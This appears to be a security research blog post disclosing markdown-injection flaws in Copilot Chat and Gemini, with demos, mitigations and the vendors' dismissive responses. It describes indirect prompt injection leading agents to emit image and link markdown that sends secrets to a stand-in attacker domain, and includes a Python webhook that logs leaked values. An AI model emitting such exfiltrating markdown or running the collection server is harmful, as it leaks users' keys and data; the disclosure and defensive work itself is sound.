This document copyright Checkmarx, all rights reserved.

Checkmarx Zero has been exploring AI and agent security, with an increased emphasis on this topic following our discovery of the novel Lies-in-the-Loop (LITL) attack, which bypasses "Human-in-the-Loop" (HITL) controls meant to prevent AI agents from running harmful code. During this research, we found several cases of markdown injection in AI agents, leading to data exfiltration. Microsoft Copilot Chat and Google Gemini are both vulnerable to this issue, which enables data exfiltration through malicious markdown content that leaks sensitive information via image requests and other rendering behaviors. We suspect most AI agents have similar issues.

Markdown injections can also serve as an amplifier for LITL attacks, a behavior we discuss thoroughly in the dedicated LITL attack blog post, which we highly encourage reading if you're interested in AI agent security. Today, however, we want to explore markdown injection as a standalone vulnerability in Copilot Chat and Google Gemini, demonstrating independent exploitation techniques and attack vectors (similar to those introduced in the Echo Leak vulnerability).

## Zero-click data exfiltration vulnerability (aka Echo Leak)

A zero-click data exfiltration attack is one in which an attacker steals data without requiring the legitimate user to take any specific action. The attacker exploits a vulnerability that automatically processes data, so your device leaks data only because it received something from a remote source.

Zero-click data exfiltration can occur, for example, when an agent renders certain Markdown elements, such as images. Under the hood, the AI agent's renderer sends a request to the remote server to fetch the image, then embeds it directly in the conversation. However, attackers can trick the agent into fetching an image (or requesting any content that the agent can be convinced is likely to be an image) from an attacker-controlled server. The attacker can construct the request so that sensitive information is part of the URL, causing the information to leak onto the attacker's server.

Here's a simple demo that shows how to exfiltrate sensitive information (in this case, a Claude API key; we used an invalidated key for the demo, for safety reasons) from the developer environment into an attacker-controlled webhook:

*Video: Exploiting Markdown Injection to cause Copilot to exfiltrate a Claude API key*

We reported this issue to Microsoft, but they did not consider it a vulnerability (their response is available at the bottom of this page). This is in line with how agent vendors have generally viewed unsafe behavior of this type: they consider it a risk the user accepts, and the user is responsible for managing that risk.

This technique is powerful because it only requires the agent to rely on an attacker-controlled online resource, such as an article, which makes the attack simple to set up. Fortunately for defenders, it can be somewhat complex for the attacker to get the agent to consume the malicious resource. Once that happens, though, the indirect prompt injection tampers with the agent's output in the chat. This causes the image element to be rendered immediately and leak sensitive information without requiring any further user intervention. Note that in the recorded demo, the image isn't rendered as a visual element; however, the GET request is still sent to the webhook.
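To make the receiving end of that GET request concrete, here is a minimal sketch of what an attacker-controlled webhook could look like. Everything in it is hypothetical (the `leak` parameter name, the port, and the injected image URL shown in the comment are our own illustration, not taken from the demo): the server simply logs whatever the agent's renderer appends to the image URL and replies with a tiny GIF so the request looks like an ordinary image fetch.

```python
# Minimal sketch of a hypothetical attacker-controlled collection endpoint.
# When the agent's renderer fetches the injected "image", whatever secret was
# embedded in the query string ends up in this server's log.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

# A 1x1 transparent GIF, returned so the request looks like a real image fetch.
TINY_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02D\x01\x00;"
)


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Example injected markdown (hypothetical parameter name):
        #   ![status](https://attacker-controlled-domain.com/pixel.gif?leak={secret})
        params = parse_qs(urlparse(self.path).query)
        print("[exfil] received:", params.get("leak", ["<nothing>"])[0])

        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(TINY_GIF)))
        self.end_headers()
        self.wfile.write(TINY_GIF)


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), ExfilHandler).serve_forever()
```

No interaction is needed on the victim's side: the renderer issues the GET request as part of displaying the agent's reply, which is what makes this variant zero-click.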
This is how injecting image elements via Markdown injection in AI agents can facilitate zero-click data exfiltration. Mitigating this risk typically involves either stripping or blocking image elements in the Markdown renderer.

## One-click data exfiltration

The widely discussed zero-click data exfiltration is not the end of the story. It's possible to trigger one-click data exfiltration with simple links. Take this markdown link, for example:

`[click here](https://attacker-controlled-domain.com?sensitiveInfo={secret})`

where `{secret}` is replaced with the actual value of the sensitive information, as shown in the Microsoft Copilot Chat zero-click demo above. Given that Microsoft didn't commit to fixing the zero-click data exfiltration issue because it wasn't considered a vulnerability, we don't expect the one-click data exfiltration variant to be fixed either.

Google Gemini, however, prevents zero-click data exfiltration (like EchoLeak) by blocking Markdown image tags using a dedicated sanitizer:

> Our markdown sanitizer identifies external image URLs and will not render them, making the "EchoLeak" 0-click image rendering exfiltration vulnerability not applicable to Gemini.

Reference: Mitigating prompt injection attacks with a layered defense strategy

Diving deeper into Google's philosophy and security strategy for mitigating prompt injection attacks reveals that while these measures reduce certain risks, the solution remains incomplete: it doesn't prevent one-click data exfiltration attacks. We reported the issue to their security team, who responded that a "fix is not feasible". This is an acceptable answer, but it means users should be warned about this risk, since this position puts it in their hands to manage.

Google's strategy involves removing known malicious URLs and other suspicious links from Gemini responses, reducing phishing and malicious link risks in general. They do so thanks to the Google Safe Browsing project; however, these links must be recognized as malicious in advance before they can be removed, meaning new threats are not automatically flagged. Attackers can set up their own new domain (i.e., one not yet known to the Google Safe Browsing project) and exploit markdown links, rather than the restricted image elements, to exfiltrate data. Combine this with social engineering and redirects, and clicking such links could easily lead to unnoticed data exposure. This attack pathway is not unique to AI agents, of course, but the layer of indirection provided by getting an AI agent to participate in the attack is a novel advantage for the attacker.

## Impact

Data exfiltration through prompt injection, including markdown injection, in AI agents can lead to severe consequences. Anything from source code disclosure to leaked secrets can not only result in a complete compromise of the remote machine but also pave the way for an attacker to escalate their privileges horizontally or vertically. Ultimately, data leaks can have serious consequences for organizations regardless of the pathway through which the data escapes. Yet the rapid adoption of AI agents in particular has created blind spots around this type of threat, which security organizations must become aware of and act to control.
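Before turning to mitigations, it's worth making the gap in image-only sanitization concrete. The sketch below is purely illustrative (it is not Gemini's actual sanitizer, and the URLs and `{secret}` placeholder are the hypothetical ones used above): it strips external Markdown image elements, which blocks the zero-click vector, but leaves ordinary links, and any secret carried in their query strings, untouched.

```python
import re

# Purely illustrative, image-only sanitizer (not Gemini's real implementation):
# external image elements are dropped, ordinary links pass through unchanged.
EXTERNAL_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*https?://[^)]+\)")


def strip_external_images(markdown: str) -> str:
    return EXTERNAL_IMAGE.sub("", markdown)


agent_output = (
    "Here is the summary you asked for.\n"
    "![status](https://attacker-controlled-domain.com/pixel.gif?leak={secret})\n"
    "[click here](https://attacker-controlled-domain.com?sensitiveInfo={secret})\n"
)

print(strip_external_images(agent_output))
# The image element (the zero-click vector) is removed, but the clickable link
# -- and the secret in its query string -- still reaches the user.
```

A single click on the surviving link is enough to send the query string, secret included, to the attacker's server, which is exactly the one-click variant described above.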
## Mitigations

Besides Markdown sanitization, the obvious measure in this context (though perhaps not as obvious, given that Microsoft completely ignores it) is to ensure that when the agent runs on the web, it not only sanitizes Markdown/HTML but also enforces a strict CSP (Content Security Policy), particularly for resources like images, CSS styles, and so on that attackers find easiest to exploit.

In the context of suggested mitigations, it is worth highlighting how Google handles Markdown and suspicious links. We highly recommend reading Google's full article "Mitigating prompt injection attacks with a layered defense strategy." However, remember that even though Gemini identifies and restricts external image URLs as a defensive measure against zero-click data exfiltration, this does not eliminate the one-click data exfiltration risk via external URIs in the links it shares.

## Wrapping Up

Markdown injection in AI agents has been recognized for some time as a risk. Nevertheless, these vulnerabilities still find their way into very popular products, such as Copilot Chat. As always with security, when new technologies emerge, it takes time for the industry to catch up, especially in this rapidly exploding area of AI, where both usage and attack surface are expanding simultaneously. But that's exactly what should make us, as security professionals, the ones who keep an eye on the door.

## Disclosure timeline

### Google

- First disclosure – 05 Oct 2025
- Google closed the issue with status Won't Fix (Infeasible) – 09 Oct 2025

Google's final response below:

> Hi! We've decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.
>
> Regarding VRP, we feel that the submission falls outside of the intended program scope, since we require submissions to demonstrate technical security vulnerabilities with a sufficient severity. For example, Google VRP covers only submissions that "substantially affect the confidentiality or integrity of user data". To provide feedback on our products, you can use our Google Product Forums, where you can share your feedback with other users and our product team.
>
> That said – if you think we misunderstood your report, and you see a well-defined security risk, please let us know what we missed. Thanks again for your report and time,

### Microsoft

- Report was submitted – 15 Oct 2025
- Microsoft acknowledged the report – 15 Oct 2025
- Microsoft notified us that the engineering team is still working on the issue – 28 Oct 2025
- Microsoft marked the report as Completed without fixing the issue – 04 Nov 2025

MSRC, Nov 4, 2025, 7:48 PM:

> Dear Ori,
>
> Thank you for your submission and for continuing to engage with MSRC. After careful review, we've determined that the behavior demonstrated does not meet our classification for a security vulnerability. It requires multiple non-default user actions, does not reliably reproduce across environments, and includes warnings designed to mitigate risk. Our assessment also considers the role of Workplace Trust, which assumes users operate in environments where they review and trust the code they choose to run. This principle is reflected in Microsoft's AI Vulnerability Severity Classification, which evaluates both impact and exploitability.
> That said, we agree this is a thoughtful observation. While not classified as a vulnerability, we've shared it with the engineering team to explore ways we can make this behavior more transparent to users. We appreciate your efforts to highlight potential concerns and welcome future submissions that demonstrate broader impact or bypass existing safeguards.
>
> Sincerely,
> Justin
> Microsoft Security Response Center